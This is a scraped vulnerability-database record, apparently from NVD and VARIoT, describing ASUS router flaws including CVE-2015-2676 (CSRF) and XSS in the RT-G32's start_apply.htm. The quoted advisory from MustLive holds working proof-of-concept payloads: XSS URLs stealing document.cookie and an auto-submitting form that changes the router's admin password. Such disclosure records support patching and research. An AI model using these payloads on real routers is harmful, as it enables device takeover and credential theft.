              "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n10\\+d1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8794D4A-5E8C-432D-A2FB-9CF86158E8D5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n10e:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9AFCC588-AAA6-45FA-8D1F-E57C7693D27A",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n56r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "14C092D3-14B2-4DBB-8C20-D15F0BA33FA8",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en ASUSWRT versi\u00f3n 3.0.0.4.384.20308. Un usuario no autenticado puede solicitar el archivo /update_applist.asp para visualizar si un dispositivo USB se encuentra adjunto al enrutador y si hay aplicaciones instaladas en el enrutador."
    }
  ],
  "id": "CVE-2018-20333",
  "lastModified": "2024-11-21T04:01:15.320",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-03-20T01:15:22.267",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://starlabs.sg/advisories/18-20333/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://starlabs.sg/advisories/18-20333/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

var-201503-0298
Vulnerability from variot

Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm. ASUS RT-G32 routers is a router device. Asus RT-G32 is prone to a cross-site request-forgery vulnerability. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected device. Other attacks are also possible.

Affected products:

Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2.

Details:

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27

http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work as via GET, as via POST (work even without authorization).

ASUS RT-G32 XSS-1.html

ASUS RT-G32 XSS exploit (C) 2015 MustLive

Cross-Site Request Forgery (WASC-09):

CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-1.html

ASUS RT-G32 CSRF exploit (C) 2015 MustLive

I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).

Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0298",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "asus",
        "version": "2.0.2.6"
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "asus",
        "version": "2.0.3.2"
      },
      {
        "model": "rt-g32",
        "scope": null,
        "trust": 0.8,
        "vendor": "asustek computer",
        "version": null
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "asustek computer",
        "version": "2.0.2.6"
      },
      {
        "model": "rt-g32",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "asustek computer",
        "version": "2.0.3.2"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "BID",
        "id": "73294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:asus:rt-g32",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:asus:rt-g32_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MustLive",
    "sources": [
      {
        "db": "BID",
        "id": "73294"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2015-2676",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2015-2676",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-01969",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-80637",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-2676",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-2676",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-01969",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201503-421",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-80637",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm. ASUS RT-G32 routers is a router device. Asus RT-G32 is prone to a cross-site request-forgery vulnerability. \nAn attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected device. Other attacks are also possible. \n\n-------------------------\nAffected products:\n-------------------------\n\nVulnerable is the next model: ASUS RT-G32 with different versions of\nfirmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and\n2.0.3.2. \n\n----------\nDetails:\n----------\n\nCross-Site Scripting (WASC-08):\n\nhttp://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27\n\nhttp://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27\n\nThese vulnerabilities work as via GET, as via POST (work even without\nauthorization). \n\nASUS RT-G32 XSS-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 XSS exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"next_page\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"group_id\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"action_script\"\nvalue=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"flag\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nCross-Site Request Forgery (WASC-09):\n\nCSRF vulnerability allows to change different settings, including admin\u0027s\npassword. As I showed in this exploit (post-auth). \n\nASUS RT-G32 CSRF-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 CSRF exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"v_password2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"action_mode\" value=\"+Apply+\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nI found this and other routers since summer to take control over terrorists\nin Crimea, Donetsk \u0026 Lugansks regions of Ukraine. Read about it in the list\n(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)\nand in many my interviews\n(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). \n\nI mentioned about these vulnerabilities at my site\n(http://websecurity.com.ua/7644/). \n\nBest wishes \u0026 regards,\nMustLive\nAdministrator of Websecurity web site\nhttp://websecurity.com.ua \n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "BID",
        "id": "73294"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-2676",
        "trust": 3.4
      },
      {
        "db": "PACKETSTORM",
        "id": "130724",
        "trust": 2.6
      },
      {
        "db": "BID",
        "id": "73294",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "db": "BID",
        "id": "73294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "id": "VAR-201503-0298",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      }
    ],
    "trust": 1.12424244
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:44:25.789000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "RT-G32",
        "trust": 0.8,
        "url": "http://www.asus.com/Networking/RTG32/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html"
      },
      {
        "trust": 2.5,
        "url": "http://websecurity.com.ua/7644/"
      },
      {
        "trust": 2.0,
        "url": "http://seclists.org/fulldisclosure/2015/mar/42"
      },
      {
        "trust": 1.4,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2676"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/73294"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2676"
      },
      {
        "trust": 0.3,
        "url": "http://www.asus.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.asus.com/networking/rtg32/"
      },
      {
        "trust": 0.1,
        "url": "http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)"
      },
      {
        "trust": 0.1,
        "url": "http://websecurity.com.ua"
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://websecurity.com.ua/7644/)."
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html)."
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27"
      },
      {
        "trust": 0.1,
        "url": "http://site/start_apply.htm\""
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "db": "BID",
        "id": "73294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "db": "BID",
        "id": "73294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "date": "2015-03-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "BID",
        "id": "73294"
      },
      {
        "date": "2015-03-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "date": "2015-03-07T11:11:11",
        "db": "PACKETSTORM",
        "id": "130724"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "date": "2015-03-23T16:59:03.617000",
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-01969"
      },
      {
        "date": "2016-12-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-80637"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "BID",
        "id": "73294"
      },
      {
        "date": "2015-03-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      },
      {
        "date": "2015-03-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      },
      {
        "date": "2024-11-21T02:27:49.793000",
        "db": "NVD",
        "id": "CVE-2015-2676"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asus RT-G32 Cross-site request forgery vulnerability in router firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001913"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "cross-site request forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201503-421"
      }
    ],
    "trust": 0.6
  }
}

var-201503-0303
Vulnerability from variot

Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information.

Details:

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27

http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work as via GET, as via POST (work even without authorization).

ASUS RT-G32 XSS-1.html

ASUS RT-G32 XSS exploit (C) 2015 MustLive

Cross-Site Request Forgery (WASC-09):

CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-1.html

ASUS RT-G32 CSRF exploit (C) 2015 MustLive

I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).

